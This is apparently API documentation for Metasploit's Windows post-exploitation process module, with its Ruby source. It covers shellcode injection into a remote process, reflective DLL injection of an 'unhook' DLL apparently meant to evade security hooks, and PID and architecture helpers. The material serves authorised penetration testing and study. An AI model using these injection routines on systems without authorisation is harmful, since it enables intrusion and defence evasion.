Module: Msf::Post::Windows::Process

Includes:
ReflectiveDLLInjection
Defined in:
lib/msf/core/post/windows/process.rb

Constant Summary

Constants included from ReflectiveDLLInjection

ReflectiveDLLInjection::PAGE_ALIGN

Constants included from ReflectiveDLLLoader

ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER

Instance Method Summary collapse

Methods included from ReflectiveDLLInjection

#inject_dll_data_into_process, #inject_dll_into_process, #inject_into_process

Methods included from ReflectiveDLLLoader

#load_rdi_dll, #load_rdi_dll_from_data

Instance Method Details

#arch_check(test_arch, pid) ⇒ Object

Checks the Architeture of a Payload and PID are compatible Returns true if they are false if they are not


15
16
17
18
19
20
21
22
23
# File 'lib/msf/core/post/windows/process.rb', line 15

def arch_check(test_arch, pid)
  # get the pid arch
  client.sys.process.processes.each do |p|
    # Check Payload Arch
    if pid == p["pid"]
      return test_arch == p['arch']
    end
  end
end

#execute_shellcode(shellcode, base_addr = nil, pid = nil) ⇒ Boolean

Injects shellcode to a process, and executes it.

Parameters:

  • shellcode (String)

    The shellcode to execute

  • base_addr (Integer) (defaults to: nil)

    The base address to allocate memory

  • pid (Integer) (defaults to: nil)

    The process ID to inject to

Returns:

  • (Boolean)

    True if successful, otherwise false


48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
# File 'lib/msf/core/post/windows/process.rb', line 48

def execute_shellcode(shellcode, base_addr=nil, pid=nil)
  pid ||= session.sys.process.getpid
  host  = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
  if base_addr.nil?
    shell_addr = host.memory.allocate(shellcode.length)
  else
    shell_addr = host.memory.allocate(shellcode.length, nil, base_addr)
  end

  host.memory.protect(shell_addr)

  if host.memory.write(shell_addr, shellcode) < shellcode.length
    vprint_error("Failed to write shellcode")
    return false
  end

  vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{pid.to_s})")
  thread = host.thread.create(shell_addr,0)
  unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread)
    vprint_error("Unable to create thread")
    nil
  end
  thread
end

#get_notepad_pathname(bits, windir, client_arch) ⇒ Object

returns the path to the notepad process based on syswow extension


26
27
28
29
30
31
32
33
34
35
36
37
# File 'lib/msf/core/post/windows/process.rb', line 26

def get_notepad_pathname(bits, windir, client_arch)
  if bits == ARCH_X86 and client_arch == ARCH_X86
    cmd = "#{windir}\\System32\\notepad.exe"
  elsif bits == ARCH_X64 and client_arch == ARCH_X64
    cmd = "#{windir}\\System32\\notepad.exe"
  elsif bits == ARCH_X64 and client_arch == ARCH_X86
    cmd = "#{windir}\\Sysnative\\notepad.exe"
  elsif bits == ARCH_X86 and client_arch == ARCH_X64
    cmd = "#{windir}\\SysWOW64\\notepad.exe"
  end
  return cmd
end

#has_pid?(pid) ⇒ Boolean

Determines if a PID actually exists

Returns:

  • (Boolean)

88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
# File 'lib/msf/core/post/windows/process.rb', line 88

def has_pid?(pid)
  procs = []
  begin
    procs = client.sys.process.processes
  rescue Rex::Post::Meterpreter::RequestError
    print_error("Unable to enumerate processes")
    return false
  end

  procs.each do |p|
    found_pid = p['pid']
    return true if found_pid == pid
  end

  print_error("PID #{pid.to_s} does not actually exist.")

  return false
end

#inject_unhook(proc, bits, delay_sec) ⇒ Object


73
74
75
76
77
78
79
80
81
82
83
84
85
# File 'lib/msf/core/post/windows/process.rb', line 73

def inject_unhook(proc, bits, delay_sec)
  if bits == ARCH_X64
    dll_file_name = 'x64.dll'
  elsif bits == ARCH_X86
    dll_file_name = 'x86.dll'
  else
    return false
  end
  dll_file = MetasploitPayloads.meterpreter_ext_path('unhook', dll_file_name)
  dll, offset = inject_dll_into_process(proc, dll_file)
  proc.thread.create(dll + offset, 0)
  Rex.sleep(delay_sec)
end